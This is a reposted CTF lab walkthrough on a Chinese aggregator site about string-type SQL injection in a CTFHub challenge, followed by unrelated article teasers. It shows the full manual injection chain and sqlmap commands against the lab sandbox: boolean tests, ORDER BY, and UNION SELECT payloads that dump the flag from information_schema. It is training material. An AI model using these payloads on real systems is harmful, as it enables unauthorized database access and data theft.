CTFHUB技能树之SQL——字符型注入

CTFHUB技能树之SQL——字符型注入

news2024/11/27 6:37:33

开启靶场，打开链接：

直接指明是SQL字符型注入，但还是来判断一下

（1）检查是否存在注入点

1' and 1=1#

返回正确

1' and 1=2#

返回错误

说明存在SQL字符型注入

（2）猜字段数

1' order by 2#

1' order by 3#

说明字段数是2

（3）爆数据库名

1' and 1=2 union select 1,database()#

得知数据库名是sqli

（4）爆表名

1' and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'#

显示表名是news表和flag表，其中flag表是我们需要的

（5）爆列名

1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#

得知flag表的列名是flag

（6）爆字段内容（flag）

1' and 1=2 union select 1,group_concat(flag) from sqli.flag#

成功得到flag：

ctfhub{ee5bfa3b423eb2d6142c66b9}

接下来就用一下sqlmap来试一下：

python sqlmap.py -u "http://challenge-a046856826dbc5de.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

python sqlmap.py -u "http://challenge-a046856826dbc5de.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump

一样成功得到flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2220766.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

InnoDB引擎(架构,事务原理,MVCC详细解读）

InnoDB引擎(架构,事务原理,MVCC详细解读）

目录架构分析逻辑存储结构内存结构 Buffer Pool ChaneBuffer 自适应哈希 LogBuffer 磁盘结构后台线程事务原理 redolog日志 undolog日志 MVCC 三个隐藏字段 undolog版本链 readview RC(读已提交原理分析) RR(可重复读原理分析…

阅读更多...

MySQL 数据库的备份与恢复：最佳实践与深度探讨

MySQL 数据库的备份与恢复：最佳实践与深度探讨

MySQL 数据库的备份与恢复：最佳实践与深度探讨在现代应用程序和企业系统中，数据库是其核心组件之一，负责存储和管理大量的关键数据。MySQL 作为一种广泛应用的开源数据库管理系统，支持高性能和可扩展性，被广泛应用于…

阅读更多...

aws 把vpc残留删除干净

aws 把vpc残留删除干净

最近忘了把vpc 删干净导致又被收了冤大头钱在删除vpc 的收发现又eni在使用，但是忘了是哪个资源在占用先用命令行把占用的资源找出来停掉使用 AWS 命令行界面（CLI）来查看 VPC 的使用情况列出子网： aws ec2 describe-subnets …

阅读更多...

每日一道算法题（Leetcode 20）

每日一道算法题（Leetcode 20）

Whats past is prologue. 凡是过去，皆为序章。题目分析 1. 我们可以用栈的结构来解决这道题。 2. 我们使用while循环，每次读取字符串中一个元素进行操作，直到最后读取到 \0为止。 3. 如果遇见 (, [ ,{ 这三种左括号，则把该左…

阅读更多...

SWAT-MODFLOW地表水与地下水耦合技术——建议收藏！

SWAT-MODFLOW地表水与地下水耦合技术——建议收藏！

原文链接：SWAT-MODFLOW地表水与地下水耦合技术——建议收藏！https://mp.weixin.qq.com/s?__bizMzUzNTczMDMxMg&mid2247623317&idx1&sn87516da827641ffd124519f929e5da26&chksmfa8da372cdfa2a643b7b806b806b31e025382b9896723d891ffd030…

阅读更多...

【Dash】feffery_antd_components 按钮组件的应用

【Dash】feffery_antd_components 按钮组件的应用

一、feffery_antd_componenet 中的 AntdFloatButton 和 AntdFloatButtonGroup AntdFloatButton 和 AntdFloatButtonGroup 是两个用于创建悬浮按钮和悬浮按钮组的组件。 AntdFloatButton 是单个悬浮按钮组件，它提供了多种属性来定义按钮的外观及行为。AntdFloatBut…

阅读更多...

2024双十一最建议买的东西有哪些？双11购物清单大全分享

2024双十一最建议买的东西有哪些？双11购物清单大全分享

双十一即将来临，各大品牌都推出了令人心动的优惠活动，让我们能够以更加实惠的价格拥有心仪的好物。其中数码家电的产品，也是迎来了一波降价高潮，因此对于数码家电爱好者而言，双十一是入手的绝佳时机！本期我…

阅读更多...

HTML+CSS实现点赞效果

HTML+CSS实现点赞效果

效果演示 HTMLCSS实现点赞效果 HTML <div class"heart-container" title"Like"><input type"checkbox" class"checkbox" id"Give-It-An-Id"><div class"svg-container"><svg viewBox&qu…

阅读更多...

AD9680（adc直采芯片）使用说明

AD9680（adc直采芯片）使用说明

写这篇文章之前我是没有使用过AD9680的芯片，但是使用过GMS011芯片（是国内24S）下的公司出来的芯片，寄存器和管脚全对标。在这里我就大概说一下芯片的说用方法一、硬件设计该芯片支持双通道射频直采支持协议JESD204B 14位采样…

阅读更多...

少儿Scratch图形化编程案例100课——015风车转转转

少儿Scratch图形化编程案例100课——015风车转转转

阅读更多...

深度学习面试笔试之前向神经网络-多层感知器、损失函数、反向传播

深度学习面试笔试之前向神经网络-多层感知器、损失函数、反向传播

深度学习面试笔试之前向神经网络-多层感知器、损失函数、反向传播 1. 什么是神经网络1.1 什么是感知器1.2 神经网络的结构1.3 为什么神经网络具有非线性切分能力 2. 神经网络的计算过程2.1 计算过程2.2 随机初始化模型参数2.3 激活函数2.3.1 激活函数有哪些2.3.2 优缺点2.3.3 为…

阅读更多...

32.第二阶段x86游戏实战2-遍历技能2（技能二叉树基址）

32.第二阶段x86游戏实战2-遍历技能2（技能二叉树基址）

免责声明：内容仅供学习参考，请合法利用知识，禁止进行违法犯罪活动！ 本次游戏没法给内容参考于：微尘网络安全本人写的内容纯属胡编乱造，全都是合成造假，仅仅只是为了娱乐，请不要…

阅读更多...

爱快路由器配置腾讯云动态域名DDNS详细说明

爱快路由器配置腾讯云动态域名DDNS详细说明

直白点说就是让爱快路由器自动配置当前公网IP地址给域名，动态域名DDNS不清楚的请自行百度， 这里就可以看见操作日志，那么我们一步一步来配置它吧，首先登录爱快路由器，如下图： 那么腾讯云我们怎么找到ID和…

阅读更多...

什么是乐观锁、悲观锁？

什么是乐观锁、悲观锁？

什么是乐观锁、悲观锁？ 乐观锁：乐观锁和悲观锁是并发控制的两种方式，用来确保在多线程或多用户访问共享资源时，数据的一致性和完整性。悲观锁（Pessimistic Lock） 悲观锁假设并发操作会经常发生&#xf…

阅读更多...

内卷中的营销大斗法：破局与挑战

内卷中的营销大斗法：破局与挑战

如今，各个行业内卷严重，企业在营销领域展开了激烈的大斗法。内卷，是指一种社会或文化模式在发展到一定阶段后，无法实现自我突破，只能在内部不断精细化、复杂化。商业领域的内卷表现为企业间在产品、服务、价格等方面…

阅读更多...

Unity通过高德开放平台获取天气信息

Unity通过高德开放平台获取天气信息

一、注册高德开放平台账号，获取天气接口Key 1、构建自己的应用网址：https://lbs.amap.com/api/webservice/guide/api/weatherinfo 最终调用api的地址形式： https://restapi.amap.com/v3/weather/weatherInfo?city110101&key<用户…

阅读更多...

比瓴科技入选国家工业信息安全发展研究中心SBOM工作组首批成员单位

比瓴科技入选国家工业信息安全发展研究中心SBOM工作组首批成员单位

近日，由开放原子开源基金会主办，开源风险评估与治理技术实验室承办的2024开放原子开源生态大会软件物料清单（SBOM）分论坛在北京成功举办。在会议上，国家工业信息安全发展研究中心（简称“中心”&#xff0…

阅读更多...

Florence-2视觉语言模型简明教程

Florence-2视觉语言模型简明教程

近年来，计算机视觉领域见证了基础模型的兴起，这些模型无需训练自定义模型即可进行图像注释。我们已经看到了用于分类的 CLIP [2]、用于对象检测的 GroundingDINO [3] 和用于分割的 SAM [4] 等模型——每个模型都在其领域表现出色。但是，如果我…

阅读更多...

互动装置如何助力乡村振兴展厅板块划分，实现展示效果最大化？

互动装置如何助力乡村振兴展厅板块划分，实现展示效果最大化？

在这片广袤的土地上，每一个乡村都承载着深厚的历史与文化，如今，随着乡村振兴战略的深入实施，为乡村注入了新的活力，乡村振兴展厅的建设，也成为了这一奋斗目标的有力见证和辅助工具，我们今天就来…

阅读更多...

从传统到智能，从被动监控到主动预警，解锁视频安防平台EasyCVR视频监控智能化升级的关键密钥

从传统到智能，从被动监控到主动预警，解锁视频安防平台EasyCVR视频监控智能化升级的关键密钥

视频监控技术从传统监控到智能化升级的过程是一个技术革新和应用场景拓展的过程。智能视频监控系统通过集成AI和机器学习算法，能够实现行为分析、人脸识别和异常事件检测等功能，提升了监控的准确性和响应速度。这些系统不仅用于传统的安全防护&#xff0…

阅读更多...

推荐文章

最新文章